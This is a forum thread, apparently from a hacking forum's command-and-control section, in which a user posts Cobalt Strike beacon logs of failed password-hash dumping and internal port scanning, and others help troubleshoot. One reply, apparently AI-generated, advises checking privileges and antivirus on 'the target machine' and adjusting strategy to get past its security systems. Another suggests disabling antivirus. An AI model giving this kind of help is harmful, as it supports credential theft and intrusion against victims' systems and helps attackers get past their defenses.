C&C [Решено] cobalt strike broken

[Sec13B]

I have this errors any help is wellcome:

beacon> hashdump
 Tasked beacon to dump hashes
 host called home, sent: 83262 bytes
 could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND
[+] host called home, sent: 1734 bytes

 beacon> portscan 192.168.254.0-192.168.254.255 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 192.168.254.0-192.168.254.255
[+] host called home, sent: 95030 bytes
[-] could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND

 beacon> hashdump
 [*] Tasked beacon to dump hashes
[+] host called home, sent: 83262 bytes
[-] could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND
beacon> exit
 [*] Tasked beacon to exit

 

[Co3d4s]

I have this errors any help is wellcome:

beacon> hashdump
 Tasked beacon to dump hashes
 host called home, sent: 83262 bytes
 could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND
[+] host called home, sent: 1734 bytes

 beacon> portscan 192.168.254.0-192.168.254.255 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 192.168.254.0-192.168.254.255
[+] host called home, sent: 95030 bytes
[-] could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND

 beacon> hashdump
 [*] Tasked beacon to dump hashes
[+] host called home, sent: 83262 bytes
[-] could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND
[-] Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND
beacon> exit
 [*] Tasked beacon to exit

9c0gpt

Based on the output you've provided, it appears there are some operational issues rather than syntax errors in your Cobalt Strike Beacon commands. Here's a breakdown of the issues and possible causes:

Issue with spawning C:\Windows\system32\wmiprvse.exe:
The error messages could not spawn C:\Windows\system32\wmiprvse.exe -Embedding: 2 - ERROR_FILE_NOT_FOUND suggest that the Beacon's attempt to spawn wmiprvse.exe failed due to the file not being found. This could be because the wmiprvse.exe file is missing from the specified path or there are restrictions imposed on the account under which the Beacon operates.
Error connecting to pipe:
The errors Could not connect to pipe: 2 - ERROR_FILE_NOT_FOUND might indicate issues with internal communication between Beacon components or with the use of named pipes in Windows. This could also be a consequence of the previous error or indicate incorrect configuration or system restrictions.
Regarding the commands, the syntax you've used seems correct:

The hashdump command to dump password hashes.
The portscan command for scanning ports in the specified range of IP addresses.
To address these issues:

Ensure the wmiprvse.exe file exists in the specified directory on the target machine.
Check if there are any restrictions on the target system that could prevent these operations (e.g., security group policies, antivirus software, or other control mechanisms).
Ensure that the account under which the Beacon operates has sufficient privileges to perform the specified operations.
Review the configuration and permissions for using named pipes in Windows.
You may need to adjust your strategy or use alternative methods to achieve your objectives, especially if standard approaches are blocked by the target machine's security systems.

 

[ElektraEmber]

Beacon is encountering issues when attempting to spawn a process (wmiprvse.exe) and connect to a pipe.
Check if wmiprvse.exe exists in C:\Windows\system32\.
Ensure that the user context in which Beacon is running has sufficient permissions to execute wmiprvse.exe. Try disabling any firewall or antivirus software that could be blocking Beacon's communication.

 

[SunYatsen]

Это выглядит так wmiprvse.exe не существует.

Или антивирус блокирует его.

 

[Sec13B]

i use it from another vps , and work perfectly , i think the problem is from the vps.
i will try reinstall , in another folder. etc

thank you